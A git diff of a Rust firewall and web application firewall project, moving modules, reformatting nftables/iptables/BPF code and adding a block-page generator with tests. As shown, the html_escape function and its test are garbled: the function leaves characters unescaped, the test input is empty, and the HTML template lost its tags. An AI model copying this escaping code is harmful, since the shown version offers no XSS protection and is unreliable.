previous_rules_guard.difference(¤t_rules).cloned().collect(); - let to_remove_v6: Vec<_> = previous_rules_v6_guard.difference(¤t_rules_v6).cloned().collect(); + let to_remove: Vec<_> = previous_rules_guard + .difference(¤t_rules) + .cloned() + .collect(); + let to_remove_v6: Vec<_> = previous_rules_v6_guard + .difference(¤t_rules_v6) + .cloned() + .collect(); let ipv4_changed = !to_add.is_empty() || !to_remove.is_empty(); let ipv6_changed = !to_add_v6.is_empty() || !to_remove_v6.is_empty(); @@ -402,22 +464,36 @@ fn apply_rules_to_iptables( } if !to_add.is_empty() || !to_remove.is_empty() { - log::info!("iptables: IPv4 rules updated (+{} -{} total={})", to_add.len(), to_remove.len(), current_rules.len()); + log::info!( + "iptables: IPv4 rules updated (+{} -{} total={})", + to_add.len(), + to_remove.len(), + current_rules.len() + ); } if !to_add_v6.is_empty() || !to_remove_v6.is_empty() { - log::info!("iptables: IPv6 rules updated (+{} -{} total={})", to_add_v6.len(), to_remove_v6.len(), current_rules_v6.len()); + log::info!( + "iptables: IPv6 rules updated (+{} -{} total={})", + to_add_v6.len(), + to_remove_v6.len(), + current_rules_v6.len() + ); } } // Update previous rules - if ipv4_changed { *previous_rules_guard = current_rules; } - if ipv6_changed { *previous_rules_v6_guard = current_rules_v6; } + if ipv4_changed { + *previous_rules_guard = current_rules; + } + if ipv6_changed { + *previous_rules_v6_guard = current_rules_v6; + } Ok(()) } fn apply_rules( - skels: &Vec>>, + skels: &Vec>>, resp: &config::ConfigApiResponse, previous_rules: &PreviousRules, previous_rules_v6: &PreviousRulesV6, @@ -571,10 +647,22 @@ fn apply_rules( // Compute diffs once against snapshots let prev_v4_snapshot = previous_rules_guard.clone(); let prev_v6_snapshot = previous_rules_v6_guard.clone(); - let removed_v4: Vec<(Ipv4Addr, u32)> = prev_v4_snapshot.difference(¤t_rules).cloned().collect(); - let added_v4: Vec<(Ipv4Addr, u32)> = current_rules.difference(&prev_v4_snapshot).cloned().collect(); - let removed_v6: Vec<(Ipv6Addr, u32)> = prev_v6_snapshot.difference(¤t_rules_v6).cloned().collect(); - let added_v6: Vec<(Ipv6Addr, u32)> = current_rules_v6.difference(&prev_v6_snapshot).cloned().collect(); + let removed_v4: Vec<(Ipv4Addr, u32)> = prev_v4_snapshot + .difference(¤t_rules) + .cloned() + .collect(); + let added_v4: Vec<(Ipv4Addr, u32)> = current_rules + .difference(&prev_v4_snapshot) + .cloned() + .collect(); + let removed_v6: Vec<(Ipv6Addr, u32)> = prev_v6_snapshot + .difference(¤t_rules_v6) + .cloned() + .collect(); + let added_v6: Vec<(Ipv6Addr, u32)> = current_rules_v6 + .difference(&prev_v6_snapshot) + .cloned() + .collect(); // Apply to all BPF skeletons for s in skels.iter() { @@ -606,8 +694,12 @@ fn apply_rules( } // Update previous snapshots once after applying to all skels - if ipv4_changed { *previous_rules_guard = current_rules; } - if ipv6_changed { *previous_rules_v6_guard = current_rules_v6; } + if ipv4_changed { + *previous_rules_guard = current_rules; + } + if ipv6_changed { + *previous_rules_v6_guard = current_rules_v6; + } Ok(()) } diff --git a/src/bpf/filter.bpf.c b/src/security/firewall/bpf/filter.bpf.c similarity index 100% rename from src/bpf/filter.bpf.c rename to src/security/firewall/bpf/filter.bpf.c diff --git a/src/bpf/filter.h b/src/security/firewall/bpf/filter.h similarity index 100% rename from src/bpf/filter.h rename to src/security/firewall/bpf/filter.h diff --git a/src/firewall/iptables.rs b/src/security/firewall/iptables.rs similarity index 93% rename from src/firewall/iptables.rs rename to src/security/firewall/iptables.rs index d08c92f..c8bb6a4 100644 --- a/src/firewall/iptables.rs +++ b/src/security/firewall/iptables.rs @@ -260,22 +260,34 @@ impl Firewall for IptablesFirewall { // TCP fingerprint blocking is not supported via iptables (requires BPF) fn block_tcp_fingerprint(&mut self, fingerprint: &str) -> Result<(), Box> { - log::warn!("TCP fingerprint blocking not supported in iptables fallback mode (fingerprint: {})", fingerprint); + log::warn!( + "TCP fingerprint blocking not supported in iptables fallback mode (fingerprint: {})", + fingerprint + ); Ok(()) } fn unblock_tcp_fingerprint(&mut self, fingerprint: &str) -> Result<(), Box> { - log::warn!("TCP fingerprint unblocking not supported in iptables fallback mode (fingerprint: {})", fingerprint); + log::warn!( + "TCP fingerprint unblocking not supported in iptables fallback mode (fingerprint: {})", + fingerprint + ); Ok(()) } fn block_tcp_fingerprint_v6(&mut self, fingerprint: &str) -> Result<(), Box> { - log::warn!("TCP fingerprint blocking (IPv6) not supported in iptables fallback mode (fingerprint: {})", fingerprint); + log::warn!( + "TCP fingerprint blocking (IPv6) not supported in iptables fallback mode (fingerprint: {})", + fingerprint + ); Ok(()) } fn unblock_tcp_fingerprint_v6(&mut self, fingerprint: &str) -> Result<(), Box> { - log::warn!("TCP fingerprint unblocking (IPv6) not supported in iptables fallback mode (fingerprint: {})", fingerprint); + log::warn!( + "TCP fingerprint unblocking (IPv6) not supported in iptables fallback mode (fingerprint: {})", + fingerprint + ); Ok(()) } diff --git a/src/firewall/mod.rs b/src/security/firewall/mod.rs similarity index 87% rename from src/firewall/mod.rs rename to src/security/firewall/mod.rs index e81a715..91e4a5d 100644 --- a/src/firewall/mod.rs +++ b/src/security/firewall/mod.rs @@ -1,14 +1,21 @@ -use std::{error::Error, net::{Ipv4Addr, Ipv6Addr}}; +use std::{ + error::Error, + net::{Ipv4Addr, Ipv6Addr}, +}; use libbpf_rs::{MapCore, MapFlags}; use serde::{Deserialize, Serialize}; use crate::utils::bpf_utils; -pub mod nftables; pub mod iptables; -pub use nftables::NftablesFirewall; +pub mod nftables; +pub mod bpf { + // Include the skeleton generated by build.rs into OUT_DIR at compile time + include!(concat!(env!("OUT_DIR"), "/filter.skel.rs")); +} pub use iptables::IptablesFirewall; +pub use nftables::NftablesFirewall; /// Enum to represent the active firewall backend #[derive(Debug, Clone, Copy, PartialEq, Eq)] @@ -85,11 +92,11 @@ pub trait Firewall { } pub struct SYNAPSEFirewall<'a> { - skel: &'a crate::bpf::FilterSkel<'a>, + skel: &'a crate::security::firewall::bpf::FilterSkel<'a>, } impl<'a> SYNAPSEFirewall<'a> { - pub fn new(skel: &'a crate::bpf::FilterSkel<'a>) -> Self { + pub fn new(skel: &'a crate::security::firewall::bpf::FilterSkel<'a>) -> Self { Self { skel } } @@ -118,6 +125,7 @@ impl<'a> Firewall for SYNAPSEFirewall<'a> { .recently_banned_ips .update(ip_bytes, &flag.to_le_bytes(), MapFlags::ANY)?; + log::debug!("bpf: banned IPv4 {}/{} with notice", ip, prefixlen); Ok(()) } @@ -130,6 +138,7 @@ impl<'a> Firewall for SYNAPSEFirewall<'a> { .banned_ips .update(ip_bytes, &flag.to_le_bytes(), MapFlags::ANY)?; + log::debug!("bpf: banned IPv4 {}/{}", ip, prefixlen); Ok(()) } @@ -157,6 +166,7 @@ impl<'a> Firewall for SYNAPSEFirewall<'a> { self.skel.maps.banned_ips.delete(ip_bytes)?; + log::debug!("bpf: unbanned IPv4 {}/{}", ip, prefixlen); Ok(()) } @@ -165,11 +175,13 @@ impl<'a> Firewall for SYNAPSEFirewall<'a> { let ip_bytes = &bpf_utils::convert_ipv6_into_bpf_map_key_bytes(ip, prefixlen); let flag = 1_u8; - self.skel - .maps - .recently_banned_ips_v6 - .update(ip_bytes, &flag.to_le_bytes(), MapFlags::ANY)?; + self.skel.maps.recently_banned_ips_v6.update( + ip_bytes, + &flag.to_le_bytes(), + MapFlags::ANY, + )?; + log::debug!("bpf: banned IPv6 {}/{} with notice", ip, prefixlen); Ok(()) } @@ -182,6 +194,7 @@ impl<'a> Firewall for SYNAPSEFirewall<'a> { .banned_ips_v6 .update(ip_bytes, &flag.to_le_bytes(), MapFlags::ANY)?; + log::debug!("bpf: banned IPv6 {}/{}", ip, prefixlen); Ok(()) } @@ -209,6 +222,7 @@ impl<'a> Firewall for SYNAPSEFirewall<'a> { self.skel.maps.banned_ips_v6.delete(ip_bytes)?; + log::debug!("bpf: unbanned IPv6 {}/{}", ip, prefixlen); Ok(()) } @@ -216,10 +230,11 @@ impl<'a> Firewall for SYNAPSEFirewall<'a> { let fp_bytes = Self::fingerprint_to_bytes(fingerprint)?; let flag = 1_u8; - self.skel - .maps - .blocked_tcp_fingerprints - .update(&fp_bytes, &flag.to_le_bytes(), MapFlags::ANY)?; + self.skel.maps.blocked_tcp_fingerprints.update( + &fp_bytes, + &flag.to_le_bytes(), + MapFlags::ANY, + )?; log::info!("Blocked TCP fingerprint (IPv4): {}", fingerprint); Ok(()) @@ -228,10 +243,7 @@ impl<'a> Firewall for SYNAPSEFirewall<'a> { fn unblock_tcp_fingerprint(&mut self, fingerprint: &str) -> Result<(), Box> { let fp_bytes = Self::fingerprint_to_bytes(fingerprint)?; - self.skel - .maps - .blocked_tcp_fingerprints - .delete(&fp_bytes)?; + self.skel.maps.blocked_tcp_fingerprints.delete(&fp_bytes)?; log::info!("Unblocked TCP fingerprint (IPv4): {}", fingerprint); Ok(()) @@ -241,10 +253,11 @@ impl<'a> Firewall for SYNAPSEFirewall<'a> { let fp_bytes = Self::fingerprint_to_bytes(fingerprint)?; let flag = 1_u8; - self.skel - .maps - .blocked_tcp_fingerprints_v6 - .update(&fp_bytes, &flag.to_le_bytes(), MapFlags::ANY)?; + self.skel.maps.blocked_tcp_fingerprints_v6.update( + &fp_bytes, + &flag.to_le_bytes(), + MapFlags::ANY, + )?; log::info!("Blocked TCP fingerprint (IPv6): {}", fingerprint); Ok(()) diff --git a/src/firewall/nftables.rs b/src/security/firewall/nftables.rs similarity index 82% rename from src/firewall/nftables.rs rename to src/security/firewall/nftables.rs index f2473e6..e897aac 100644 --- a/src/firewall/nftables.rs +++ b/src/security/firewall/nftables.rs @@ -82,7 +82,8 @@ impl NftablesFirewall { /// Initialize using nft command directly (more reliable) fn init_with_nft_command(&self) -> Result<(), Box> { // Use nft -f with heredoc-style input for reliable parsing - let nft_script = format!(r#" + let nft_script = format!( + r#" table inet {table} {{ set {set_v4} {{ type ipv4_addr @@ -143,12 +144,19 @@ table inet {table} {{ log::debug!("nftables kernel support not available: {}", stderr); return Err("nftables kernel support not available (Operation not supported) - this is common in containers or systems without nf_tables kernel module".into()); } else if stderr.contains("Permission denied") { - return Err("nftables permission denied - ensure synapse runs as root with CAP_NET_ADMIN".into()); + return Err( + "nftables permission denied - ensure synapse runs as root with CAP_NET_ADMIN" + .into(), + ); } else if stderr.contains("No such file or directory") { return Err("nftables failed - nft command or required files not found".into()); } else { log::debug!("nftables initialization failed: {}", stderr); - return Err(format!("nftables initialization failed: {}", stderr.lines().next().unwrap_or("unknown error")).into()); + return Err(format!( + "nftables initialization failed: {}", + stderr.lines().next().unwrap_or("unknown error") + ) + .into()); } } @@ -156,7 +164,12 @@ table inet {table} {{ } /// Add an IPv4 address/CIDR to a set - fn add_to_set_v4(&self, set_name: &str, ip: Ipv4Addr, prefixlen: u32) -> Result<(), Box> { + fn add_to_set_v4( + &self, + set_name: &str, + ip: Ipv4Addr, + prefixlen: u32, + ) -> Result<(), Box> { let addr = if prefixlen == 32 { ip.to_string() } else { @@ -180,14 +193,21 @@ table inet {table} {{ } else { stderr.to_string() }; - return Err(format!("Failed to add {} to {}: {}", addr, set_name, error_msg).into()); + return Err( + format!("Failed to add {} to {}: {}", addr, set_name, error_msg).into(), + ); } } Ok(()) } /// Remove an IPv4 address/CIDR from a set - fn remove_from_set_v4(&self, set_name: &str, ip: Ipv4Addr, prefixlen: u32) -> Result<(), Box> { + fn remove_from_set_v4( + &self, + set_name: &str, + ip: Ipv4Addr, + prefixlen: u32, + ) -> Result<(), Box> { let addr = if prefixlen == 32 { ip.to_string() } else { @@ -195,14 +215,23 @@ table inet {table} {{ }; let output = nft_cmd() - .args(["delete", "element", "inet", NFT_TABLE_NAME, set_name, &format!("{{ {} }}", addr)]) + .args([ + "delete", + "element", + "inet", + NFT_TABLE_NAME, + set_name, + &format!("{{ {} }}", addr), + ]) .output()?; if !output.status.success() { let stderr = String::from_utf8_lossy(&output.stderr); // Ignore "not found" errors if !stderr.contains("No such") && !stderr.contains("does not exist") { - return Err(format!("Failed to remove {} from {}: {}", addr, set_name, stderr).into()); + return Err( + format!("Failed to remove {} from {}: {}", addr, set_name, stderr).into(), + ); } } Ok(()) @@ -223,7 +252,12 @@ table inet {table} {{ } /// Add an IPv6 address/CIDR to a set - fn add_to_set_v6(&self, set_name: &str, ip: Ipv6Addr, prefixlen: u32) -> Result<(), Box> { + fn add_to_set_v6( + &self, + set_name: &str, + ip: Ipv6Addr, + prefixlen: u32, + ) -> Result<(), Box> { let addr = if prefixlen == 128 { ip.to_string() } else { @@ -246,14 +280,21 @@ table inet {table} {{ } else { stderr.to_string() }; - return Err(format!("Failed to add {} to {}: {}", addr, set_name, error_msg).into()); + return Err( + format!("Failed to add {} to {}: {}", addr, set_name, error_msg).into(), + ); } } Ok(()) } /// Remove an IPv6 address/CIDR from a set - fn remove_from_set_v6(&self, set_name: &str, ip: Ipv6Addr, prefixlen: u32) -> Result<(), Box> { + fn remove_from_set_v6( + &self, + set_name: &str, + ip: Ipv6Addr, + prefixlen: u32, + ) -> Result<(), Box> { let addr = if prefixlen == 128 { ip.to_string() } else { @@ -261,13 +302,22 @@ table inet {table} {{ }; let output = nft_cmd() - .args(["delete", "element", "inet", NFT_TABLE_NAME, set_name, &format!("{{ {} }}", addr)]) + .args([ + "delete", + "element", + "inet", + NFT_TABLE_NAME, + set_name, + &format!("{{ {} }}", addr), + ]) .output()?; if !output.status.success() { let stderr = String::from_utf8_lossy(&output.stderr); if !stderr.contains("No such") && !stderr.contains("does not exist") { - return Err(format!("Failed to remove {} from {}: {}", addr, set_name, stderr).into()); + return Err( + format!("Failed to remove {} from {}: {}", addr, set_name, stderr).into(), + ); } } Ok(()) @@ -356,22 +406,34 @@ impl Firewall for NftablesFirewall { // TCP fingerprint blocking is not supported via nftables (requires BPF) // These are no-ops in the nftables fallback fn block_tcp_fingerprint(&mut self, fingerprint: &str) -> Result<(), Box> { - log::warn!("TCP fingerprint blocking not supported in nftables fallback mode (fingerprint: {})", fingerprint); + log::warn!( + "TCP fingerprint blocking not supported in nftables fallback mode (fingerprint: {})", + fingerprint + ); Ok(()) } fn unblock_tcp_fingerprint(&mut self, fingerprint: &str) -> Result<(), Box> { - log::warn!("TCP fingerprint unblocking not supported in nftables fallback mode (fingerprint: {})", fingerprint); + log::warn!( + "TCP fingerprint unblocking not supported in nftables fallback mode (fingerprint: {})", + fingerprint + ); Ok(()) } fn block_tcp_fingerprint_v6(&mut self, fingerprint: &str) -> Result<(), Box> { - log::warn!("TCP fingerprint blocking (IPv6) not supported in nftables fallback mode (fingerprint: {})", fingerprint); + log::warn!( + "TCP fingerprint blocking (IPv6) not supported in nftables fallback mode (fingerprint: {})", + fingerprint + ); Ok(()) } fn unblock_tcp_fingerprint_v6(&mut self, fingerprint: &str) -> Result<(), Box> { - log::warn!("TCP fingerprint unblocking (IPv6) not supported in nftables fallback mode (fingerprint: {})", fingerprint); + log::warn!( + "TCP fingerprint unblocking (IPv6) not supported in nftables fallback mode (fingerprint: {})", + fingerprint + ); Ok(()) } diff --git a/src/firewall_noop.rs b/src/security/firewall_noop.rs similarity index 93% rename from src/firewall_noop.rs rename to src/security/firewall_noop.rs index 981cae6..be4a0fd 100644 --- a/src/firewall_noop.rs +++ b/src/security/firewall_noop.rs @@ -96,7 +96,11 @@ impl<'a> Firewall for SYNAPSEFirewall<'a> { Ok(false) } - fn ban_ipv6_with_notice(&mut self, _ip: Ipv6Addr, _prefixlen: u32) -> Result<(), Box> { + fn ban_ipv6_with_notice( + &mut self, + _ip: Ipv6Addr, + _prefixlen: u32, + ) -> Result<(), Box> { Ok(()) } @@ -143,7 +147,9 @@ pub struct NftablesFirewall { impl NftablesFirewall { pub fn new() -> Result> { - Ok(Self { _marker: PhantomData }) + Ok(Self { + _marker: PhantomData, + }) } pub fn is_available() -> bool { @@ -172,7 +178,11 @@ impl Firewall for NftablesFirewall { Ok(false) } - fn ban_ipv6_with_notice(&mut self, _ip: Ipv6Addr, _prefixlen: u32) -> Result<(), Box> { + fn ban_ipv6_with_notice( + &mut self, + _ip: Ipv6Addr, + _prefixlen: u32, + ) -> Result<(), Box> { Ok(()) } @@ -219,7 +229,9 @@ pub struct IptablesFirewall { impl IptablesFirewall { pub fn new() -> Result> { - Ok(Self { _marker: PhantomData }) + Ok(Self { + _marker: PhantomData, + }) } pub fn is_available() -> bool { @@ -248,7 +260,11 @@ impl Firewall for IptablesFirewall { Ok(false) } - fn ban_ipv6_with_notice(&mut self, _ip: Ipv6Addr, _prefixlen: u32) -> Result<(), Box> { + fn ban_ipv6_with_notice( + &mut self, + _ip: Ipv6Addr, + _prefixlen: u32, + ) -> Result<(), Box> { Ok(()) } diff --git a/src/security/mod.rs b/src/security/mod.rs new file mode 100644 index 0000000..0596232 --- /dev/null +++ b/src/security/mod.rs @@ -0,0 +1,4 @@ +pub mod access_rules; +#[cfg(all(feature = "bpf", not(feature = "disable-bpf")))] +pub mod firewall; +pub mod waf; diff --git a/src/security/waf/actions/block.rs b/src/security/waf/actions/block.rs new file mode 100644 index 0000000..98c5d0f --- /dev/null +++ b/src/security/waf/actions/block.rs @@ -0,0 +1,549 @@ +//! WAF Block Action Implementation +//! +//! This module provides functionality for blocking malicious requests, +//! including customizable block pages and response generation. + +use serde::{Deserialize, Serialize}; + +/// Block response configuration +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct BlockConfig { + /// HTTP status code for blocked requests (default: 403) + #[serde(default = "default_status_code")] + pub status_code: u16, + /// Custom message to display on block page + #[serde(default)] + pub message: Option, + /// Whether to show technical details (rule ID, etc.) + #[serde(default)] + pub show_details: bool, + /// Custom HTML template for block page + #[serde(default)] + pub custom_template: Option, + /// Response content type + #[serde(default = "default_content_type")] + pub content_type: String, +} + +fn default_status_code() -> u16 { + 403 +} + +fn default_content_type() -> String { + "text/html; charset=utf-8".to_string() +} + +impl Default for BlockConfig { + fn default() -> Self { + Self { + status_code: 403, + message: None, + show_details: false, + custom_template: None, + content_type: default_content_type(), + } + } +} + +/// Block response details for logging and display +#[derive(Debug, Clone)] +pub struct BlockDetails { + pub rule_id: String, + pub rule_name: String, + pub reason: Option, + pub client_ip: String, + pub request_id: Option, +} + +/// Generate an HTML block page +pub fn generate_block_page(config: &BlockConfig, details: Option<&BlockDetails>) -> String { + // Use custom template if provided + if let Some(template) = &config.custom_template { + return render_custom_template(template, config, details); + } + + let message = config + .message + .clone() + .unwrap_or_else(|| "Access Denied".to_string()); + + let status_text = get_status_text(config.status_code); + + let details_html = if config.show_details { + if let Some(d) = details { + format!( + r#" +
+

Rule ID: {}

+ {} + {} +
"#, + html_escape(&d.rule_id), + d.reason + .as_ref() + .map(|r| format!("

Reason: {}

", html_escape(r))) + .unwrap_or_default(), + d.request_id + .as_ref() + .map(|id| format!("

Request ID: {}

", html_escape(id))) + .unwrap_or_default(), + ) + } else { + String::new() + } + } else { + String::new() + }; + + format!( + r#" + + + + + {} {} + + + +
+
+ + + +
+
{}
+
{}
+

{}

+ {} + +
+ +"#, + config.status_code, + status_text, + config.status_code, + status_text, + html_escape(&message), + details_html, + ) +} + +/// Generate a JSON block response +pub fn generate_block_json(config: &BlockConfig, details: Option<&BlockDetails>) -> String { + let message = config + .message + .clone() + .unwrap_or_else(|| "Access Denied".to_string()); + + if config.show_details { + if let Some(d) = details { + return serde_json::json!({ + "error": { + "code": config.status_code, + "message": message, + "rule_id": d.rule_id, + "rule_name": d.rule_name, + "reason": d.reason, + "request_id": d.request_id, + } + }) + .to_string(); + } + } + + serde_json::json!({ + "error": { + "code": config.status_code, + "message": message, + } + }) + .to_string() +} + +/// Generate a plain text block response +pub fn generate_block_text(config: &BlockConfig, details: Option<&BlockDetails>) -> String { + let message = config + .message + .clone() + .unwrap_or_else(|| "Access Denied".to_string()); + + if config.show_details { + if let Some(d) = details { + return format!( + "{} {}\n{}\nRule: {} ({})\n{}{}", + config.status_code, + get_status_text(config.status_code), + message, + d.rule_name, + d.rule_id, + d.reason + .as_ref() + .map(|r| format!("Reason: {}\n", r)) + .unwrap_or_default(), + d.request_id + .as_ref() + .map(|id| format!("Request ID: {}\n", id)) + .unwrap_or_default(), + ); + } + } + + format!( + "{} {}\n{}", + config.status_code, + get_status_text(config.status_code), + message + ) +} + +/// Generate block response based on Accept header +pub fn generate_block_response( + config: &BlockConfig, + details: Option<&BlockDetails>, + accept_header: Option<&str>, +) -> (String, String) { + let accept = accept_header.unwrap_or("text/html"); + + if accept.contains("application/json") { + ( + generate_block_json(config, details), + "application/json; charset=utf-8".to_string(), + ) + } else if accept.contains("text/plain") { + ( + generate_block_text(config, details), + "text/plain; charset=utf-8".to_string(), + ) + } else { + ( + generate_block_page(config, details), + "text/html; charset=utf-8".to_string(), + ) + } +} + +/// Render a custom template with variable substitution +fn render_custom_template( + template: &str, + config: &BlockConfig, + details: Option<&BlockDetails>, +) -> String { + let mut result = template.to_string(); + + // Replace basic variables + result = result.replace("{{status_code}}", &config.status_code.to_string()); + result = result.replace("{{status_text}}", get_status_text(config.status_code)); + result = result.replace( + "{{message}}", + &config + .message + .clone() + .unwrap_or_else(|| "Access Denied".to_string()), + ); + + // Replace detail variables if available + if let Some(d) = details { + result = result.replace("{{rule_id}}", &html_escape(&d.rule_id)); + result = result.replace("{{rule_name}}", &html_escape(&d.rule_name)); + result = result.replace( + "{{reason}}", + &d.reason + .as_ref() + .map(|r| html_escape(r)) + .unwrap_or_default(), + ); + result = result.replace("{{client_ip}}", &html_escape(&d.client_ip)); + result = result.replace( + "{{request_id}}", + &d.request_id + .as_ref() + .map(|id| html_escape(id)) + .unwrap_or_default(), + ); + } else { + // Clear detail placeholders if no details provided + result = result.replace("{{rule_id}}", ""); + result = result.replace("{{rule_name}}", ""); + result = result.replace("{{reason}}", ""); + result = result.replace("{{client_ip}}", ""); + result = result.replace("{{request_id}}", ""); + } + + result +} + +/// Get HTTP status text for common status codes +fn get_status_text(status_code: u16) -> &'static str { + match status_code { + 400 => "Bad Request", + 401 => "Unauthorized", + 403 => "Forbidden", + 404 => "Not Found", + 405 => "Method Not Allowed", + 406 => "Not Acceptable", + 408 => "Request Timeout", + 413 => "Payload Too Large", + 414 => "URI Too Long", + 415 => "Unsupported Media Type", + 418 => "I'm a Teapot", + 429 => "Too Many Requests", + 451 => "Unavailable For Legal Reasons", + 500 => "Internal Server Error", + 501 => "Not Implemented", + 502 => "Bad Gateway", + 503 => "Service Unavailable", + 504 => "Gateway Timeout", + _ => "Blocked", + } +} + +/// HTML escape special characters +fn html_escape(s: &str) -> String { + s.replace('&', "&") + .replace('<', "<") + .replace('>', ">") + .replace('"', """) + .replace('\'', "'") +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_default_block_config() { + let config = BlockConfig::default(); + assert_eq!(config.status_code, 403); + assert!(config.message.is_none()); + assert!(!config.show_details); + assert!(config.custom_template.is_none()); + } + + #[test] + fn test_generate_block_page() { + let config = BlockConfig::default(); + let page = generate_block_page(&config, None); + + assert!(page.contains("403")); + assert!(page.contains("Forbidden")); + assert!(page.contains("Access Denied")); + assert!(page.contains("Gen0Sec")); + } + + #[test] + fn test_generate_block_page_with_details() { + let config = BlockConfig { + status_code: 403, + message: Some("You have been blocked".to_string()), + show_details: true, + custom_template: None, + content_type: "text/html".to_string(), + }; + + let details = BlockDetails { + rule_id: "rule_123".to_string(), + rule_name: "SQL Injection Detection".to_string(), + reason: Some("Detected SQL injection pattern".to_string()), + client_ip: "192.168.1.1".to_string(), + request_id: Some("req_abc123".to_string()), + }; + + let page = generate_block_page(&config, Some(&details)); + + assert!(page.contains("rule_123")); + assert!(page.contains("Detected SQL injection pattern")); + assert!(page.contains("req_abc123")); + } + + #[test] + fn test_generate_block_json() { + let config = BlockConfig { + status_code: 429, + message: Some("Rate limit exceeded".to_string()), + show_details: true, + custom_template: None, + content_type: "application/json".to_string(), + }; + + let details = BlockDetails { + rule_id: "rate_limit_1".to_string(), + rule_name: "Rate Limiter".to_string(), + reason: Some("Too many requests".to_string()), + client_ip: "10.0.0.1".to_string(), + request_id: None, + }; + + let json = generate_block_json(&config, Some(&details)); + + assert!(json.contains("429")); + assert!(json.contains("Rate limit exceeded")); + assert!(json.contains("rate_limit_1")); + } + + #[test] + fn test_generate_block_text() { + let config = BlockConfig { + status_code: 403, + message: Some("Blocked by WAF".to_string()), + show_details: false, + custom_template: None, + content_type: "text/plain".to_string(), + }; + + let text = generate_block_text(&config, None); + + assert!(text.contains("403")); + assert!(text.contains("Forbidden")); + assert!(text.contains("Blocked by WAF")); + } + + #[test] + fn test_generate_block_response_json() { + let config = BlockConfig::default(); + let (body, content_type) = generate_block_response(&config, None, Some("application/json")); + + assert!(body.contains("error")); + assert!(content_type.contains("application/json")); + } + + #[test] + fn test_generate_block_response_html() { + let config = BlockConfig::default(); + let (body, content_type) = + generate_block_response(&config, None, Some("text/html, application/xhtml+xml")); + + assert!(body.contains("")); + assert!(content_type.contains("text/html")); + } + + #[test] + fn test_custom_template() { + let config = BlockConfig { + status_code: 403, + message: Some("Custom block".to_string()), + show_details: true, + custom_template: Some( + "Error {{status_code}}: {{message}} - Rule ID: {{rule_id}}" + .to_string(), + ), + content_type: "text/html".to_string(), + }; + + let details = BlockDetails { + rule_id: "test_rule".to_string(), + rule_name: "Test Rule".to_string(), + reason: None, + client_ip: "127.0.0.1".to_string(), + request_id: None, + }; + + let page = generate_block_page(&config, Some(&details)); + + assert!(page.contains("Error 403")); + assert!(page.contains("Custom block")); + assert!(page.contains("test_rule")); + } + + #[test] + fn test_html_escape() { + let input = ""; + let escaped = html_escape(input); + assert!(!escaped.contains('<')); + assert!(!escaped.contains('>')); + assert!(escaped.contains("<")); + assert!(escaped.contains(">")); + } + + #[test] + fn test_status_text() { + assert_eq!(get_status_text(403), "Forbidden"); + assert_eq!(get_status_text(429), "Too Many Requests"); + assert_eq!(get_status_text(500), "Internal Server Error"); + assert_eq!(get_status_text(999), "Blocked"); + } +} diff --git a/src/waf/actions/captcha.rs b/src/security/waf/actions/captcha.rs similarity index 81% rename from src/waf/actions/captcha.rs rename to src/security/waf/actions/captcha.rs index 74644a8..d0f9fd4 100644 --- a/src/waf/actions/captcha.rs +++ b/src/security/waf/actions/captcha.rs @@ -4,14 +4,14 @@ use std::time::{Duration, Instant}; use anyhow::{Context, Result}; use chrono::Utc; +use jsonwebtoken::{Algorithm, DecodingKey, EncodingKey, Header, Validation, decode, encode}; use redis::AsyncCommands; use serde::{Deserialize, Serialize}; -use tokio::sync::{RwLock, OnceCell}; -use jsonwebtoken::{encode, decode, Header, Algorithm, Validation, EncodingKey, DecodingKey}; +use tokio::sync::{OnceCell, RwLock}; use uuid::Uuid; -use crate::redis::RedisManager; -use crate::http_client::get_global_reqwest_client; +use crate::storage::redis::RedisManager; +use crate::utils::http_client::get_global_reqwest_client; /// Captcha provider types supported by Gen0Sec #[derive(Debug, Clone, Serialize, Deserialize, PartialEq, clap::ValueEnum)] @@ -69,12 +69,12 @@ pub struct CaptchaValidationResponse { #[derive(Debug, Clone, Serialize, Deserialize)] pub struct CaptchaClaims { /// Standard JWT claims - pub sub: String, // Subject (user identifier) - pub iss: String, // Issuer - pub aud: String, // Audience - pub exp: i64, // Expiration time - pub iat: i64, // Issued at - pub jti: String, // JWT ID (unique identifier) + pub sub: String, // Subject (user identifier) + pub iss: String, // Issuer + pub aud: String, // Audience + pub exp: i64, // Expiration time + pub iat: i64, // Issued at + pub jti: String, // JWT ID (unique identifier) /// Custom captcha claims pub ip_address: String, @@ -117,9 +117,7 @@ pub struct CaptchaClient { } impl CaptchaClient { - pub fn new( - config: CaptchaConfig, - ) -> Self { + pub fn new(config: CaptchaConfig) -> Self { Self { config, validation_cache: Arc::new(RwLock::new(HashMap::new())), @@ -129,22 +127,34 @@ impl CaptchaClient { /// Validate a captcha response token pub async fn validate_captcha(&self, request: CaptchaValidationRequest) -> Result { - log::info!("Starting captcha validation for IP: {}, provider: {:?}", - request.ip_address, self.config.provider); + log::info!( + "Starting captcha validation for IP: {}, provider: {:?}", + request.ip_address, + self.config.provider + ); // Check if captcha response is provided if request.response_token.is_empty() { - log::warn!("No captcha response provided for IP: {}", request.ip_address); + log::warn!( + "No captcha response provided for IP: {}", + request.ip_address + ); return Ok(false); } - log::debug!("Captcha response token length: {}", request.response_token.len()); + log::debug!( + "Captcha response token length: {}", + request.response_token.len() + ); // Check validation cache first let cache_key = format!("{}:{}", request.response_token, request.ip_address); if let Some(cached) = self.get_validation_cache(&cache_key).await { if cached.expires_at > Instant::now() { - log::debug!("Captcha validation for {} found in cache", request.ip_address); + log::debug!( + "Captcha validation for {} found in cache", + request.ip_address + ); return Ok(cached.is_valid); } else { self.remove_validation_cache(&cache_key).await; @@ -158,7 +168,11 @@ impl CaptchaClient { CaptchaProvider::Turnstile => self.validate_turnstile(&request).await?, }; - log::info!("Captcha validation result for IP {}: {}", request.ip_address, is_valid); + log::info!( + "Captcha validation result for IP {}: {}", + request.ip_address, + is_valid + ); // Cache the result self.set_validation_cache(&cache_key, is_valid).await; @@ -194,8 +208,8 @@ impl CaptchaClient { let header = Header::new(Algorithm::HS256); let encoding_key = EncodingKey::from_secret(self.config.jwt_secret.as_bytes()); - let token = encode(&header, &claims, &encoding_key) - .context("Failed to encode JWT token")?; + let token = + encode(&header, &claims, &encoding_key).context("Failed to encode JWT token")?; let captcha_token = CaptchaToken { token: token.clone(), @@ -204,7 +218,11 @@ impl CaptchaClient { // Store token in Redis for validation (optional, JWT is self-contained) if let Ok(redis_manager) = RedisManager::get() { - let key = format!("{}:captcha_jwt:{}", redis_manager.create_namespace("captcha"), jti); + let key = format!( + 